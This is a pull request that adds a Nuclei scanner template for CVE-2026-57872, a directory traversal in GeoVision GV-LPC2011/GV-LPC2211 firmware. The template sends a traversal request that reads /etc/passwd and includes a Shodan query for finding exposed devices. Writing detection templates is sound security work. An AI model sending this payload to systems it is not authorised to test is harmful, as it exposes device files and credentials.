### PR TITLE
feat: add nuclei template for CVE-2026-57872

### DIFF
--- a/http/cves/2026/CVE-2026-57872.yaml
+++ b/http/cves/2026/CVE-2026-57872.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-57872
+
+info:
+  name: GeoVision GV-LPC2011/GV-LPC2211 - Directory Traversal
+  author: Hardik-369
+  severity: high
+  description: |
+    An unauthenticated directory traversal vulnerability exists in get_fcont.cgi in GeoVision GV-LPC2011 and GV-LPC2211 V1.12 and earlier. The vulnerability is caused by insufficient validation of user-supplied file path input before the requested file is accessed by the CGI component. A remote attacker may exploit this vulnerability by sending a crafted request to read arbitrary files accessible to the affected process, resulting in information disclosure.
+  impact: |
+    An unauthenticated remote attacker can read arbitrary files on the device, including configuration files and credentials.
+  remediation: |
+    Update to the latest firmware version as specified in the GeoVision security advisory.
+  reference:
+    - https://www.geovision.com.tw/tw/cyber_security.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-57872
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-57872
+    cwe-id: CWE-22
+  metadata:
+    max-request: 1
+    verified: false
+    vendor: geovision
+    product: gv-lpc2011
+    shodan-query: http.html:"GV-LPC"
+  tags: cve,cve2026,geovision,lfi,traversal,disclosure
+
+http:
+  - raw:
+      - |
+        GET /get_fcont.cgi?name=../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-57872.yaml
+++ b/http/cves/2026/CVE-2026-57872.yaml
@@ -22,7 +22,7 @@ info:
     max-request: 1
     verified: false
     vendor: geovision
-    product: gv-lpc2011
+    product: gv-lpc2011,gv-lpc2211
     shodan-query: http.html:"GV-LPC"
   tags: cve,cve2026,geovision,lfi,traversal,disclosure
 


### PR DESCRIPTION
Adds Nuclei template for CVE-2026-57872 - GeoVision GV-LPC2011/GV-LPC2211 directory traversal in get_fcont.cgi